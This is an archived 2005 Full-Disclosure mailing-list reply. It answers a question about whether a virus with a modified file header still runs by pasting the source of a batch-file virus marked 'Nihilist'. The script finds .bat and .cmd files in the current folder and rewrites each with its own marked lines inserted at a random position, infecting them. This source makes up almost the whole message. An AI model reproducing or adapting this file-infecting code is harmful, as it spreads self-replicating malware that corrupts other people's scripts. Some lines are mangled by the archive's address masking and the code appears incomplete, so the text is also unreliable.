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Message-ID: <200510280210.j9S2ASWJ029764@mailserver3.hushmail.com>
Date: Fri Oct 28 14:25:46 2005
From: auto445789 at hushmail.com (auto445789@...hmail.com)
Subject: RE: Full-Disclosure Digest, Vol 8, Issue 48
> The virus scanner determined the type of the file by
> the header and it failed. That's bad news. I am
> wondering however, when I execute that file, how does
> the OS process the file? I guess my question is, if I
> have a modified version of a virus, with whatever
> header, if I try to execute that file, will the virus
> code get executed?
Lets see, do you think this would be executed?
%Nihilist%@...o off
%Nihilist%set num=0
:ag %Nihilist%
%Nihilist%set fn%num%=
%Nihilist%set /a num+=1
%Nihilist%if %num% LSS 5 goto ag
%Nihilist%set num=0
%Nihilist%for %%a in (*.bat *.cmd) do call :mr %%a
%Nihilist%set num=-1
:fi %Nihilist%
%Nihilist%set /a num+=1
%Nihilist%if %num% GTR 5 (goto ROF)
%Nihilist%if %num% EQU 0 (set file=%fn0%)
%Nihilist%if %num% EQU 1 (set file=%fn1%)
%Nihilist%if %num% EQU 2 (set file=%fn2%)
%Nihilist%if %num% EQU 3 (set file=%fn3%)
%Nihilist%if %num% EQU 4 (set file=%fn4%)
%Nihilist%if %num% EQU 5 (set file=%fn5%)
%Nihilist%set rnd=%random%
%Nihilist%set spth=%0
:findnum %Nihilist%
%Nihilist%set /a rnd-=10
%Nihilist%if %rnd% GEQ 10 (goto findnum)
%Nihilist%set lz=0
%Nihilist%del tmp
%Nihilist%for /f "tokens=1*" %%a in (%file%) do if 1 EQU 1 (
%Nihilist% set lc=%%a %%b
%Nihilist% call :wl
find "Nihilist" <%spth% >>tmp
%Nihilist%more +%rnd% < %file% >>tmp
%Nihilist%move /y tmp %file%
%Nihilist%@...o on
%Nihilist%goto fi
:wl %Nihilist%
%Nihilist%set /a lz=%lz%+1
%Nihilist%if %lz% LEQ %rnd% (echo %lc% >>tmp)
%Nihilist%goto :EOF
:mr %Nihilist%
%Nihilist%if %num% LEQ 5 (
%Nihilist%set fn%num%=%1
%Nihilist%set /a num+=1
:ROF %Nihilist%
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